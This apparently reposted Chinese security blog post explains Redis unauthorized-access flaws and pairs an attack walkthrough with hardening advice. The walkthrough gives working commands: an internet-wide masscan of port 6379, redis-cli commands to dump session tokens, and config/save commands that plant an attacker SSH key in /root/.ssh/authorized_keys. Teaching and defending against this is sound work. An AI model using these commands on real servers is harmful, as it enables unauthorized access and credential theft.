Redis未授权

admin 2025年4月8日20:00:40评论5 views字数 1216阅读4分3秒阅读模式

🧠 一句话解释什么是“Redis 未授权访问”?

Redis 未授权访问漏洞指的是:

Redis 服务没设置密码(或防护配置),任何人都能连上它,执行任何命令,就像你的冰箱门没关,谁都能进去拿东西,甚至放炸弹。

🏗️ Redis 是什么?(你得知道它干啥)

Redis 是一个超快的键值数据库,开发者用它来:

  • 存储用户会话(session)
  • 缓存数据
  • 存用户登录状态
  • 存验证码、Token
  • 分布式锁 等等…

它跑在默认端口 6379,可以用 redis-cli 连上,也可以远程连接(如果没关防火墙)

💣 红队怎么发现目标 Redis 没授权?

🧑‍💻 黑客视角流程如下:

第一步:全网扫描

使用工具批量扫开放 6379 端口的 Redis 主机:

masscan -p 6379 0.0.0.0/0 --rate=100000

第二步:验证是否需要认证

连接 Redis:

redis-cli -h x.x.x.x -p 6379

若返回:

127.0.0.1:6379>

说明没设密码,就等于:未授权访问 ✅ 成功进入!

🛠️ 利用方式(小白秒懂):

🧨 场景1:获取敏感信息

keys *get session:admin_token

能直接获取登录态、验证码、用户 Token、邮箱等!

🧨 场景2:写文件 → 提权 / 获取服务器控制权

Redis 支持保存数据到硬盘上,黑客可以利用这个:

config set dir /root/.ssh/config set dbfilename authorized_keysset x "nn攻击者的ssh公钥nn"save

☠️ 攻击者可以直接用 SSH 登录服务器,无需密码!

🧨 场景3:反弹 Shell / 挖矿 / 横向移动

将 Redis 当作跳板机,比如写定时任务、写反弹脚本、挂马页、部署挖矿木马……

🚨 实战案例(真实发生)

🎯 某教育 SaaS 平台

  • Redis 未授权开放公网
  • 攻击者 dump 出 session,登录后台
  • 后台支持命令执行,成功横向到内网控制多台服务器
  • 最终挖矿+数据勒索+Git 泄露

🛡️ 防护措施(小白照做就行)

防护措施
说明
🔐 设置 Redis 密码
在 redis.conf 添加:requirepass StrongPassword123!
🌐 禁止公网访问
配置防火墙,仅允许内网或特定 IP 访问 Redis
🔒 关闭危险命令
禁用 CONFIGFLUSHALLSAVE 等危险命令
🛡️ 使用内网监听
把 bind 127.0.0.1 或 bind 内网IP 写入配置
🧱 配合 WAF / IDS 检测暴力破解
防止暴力尝试密码
🎯 定期资产扫描
自查服务器有没有 Redis 暴露在公网端口(6379)

🚀 彩蛋:一行命令检测自己是否存在风险

redis-cli -h 127.0.0.1 ping

如果返回:

PONG

说明 Redis 正常且没要求认证,如果你能远程连上,就危险了!

✅ 总结一句话:

Redis 就像一把钥匙串,未授权就是把钥匙丢在马路上,攻击者不仅能进门,还能翻你抽屉、换门锁、住你家,一定要上锁!

关注公众号获取更多内容

原文始发于微信公众号(季升安全):Redis未授权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月8日20:00:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Redis未授权https://cn-sec.com/archives/3931090.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息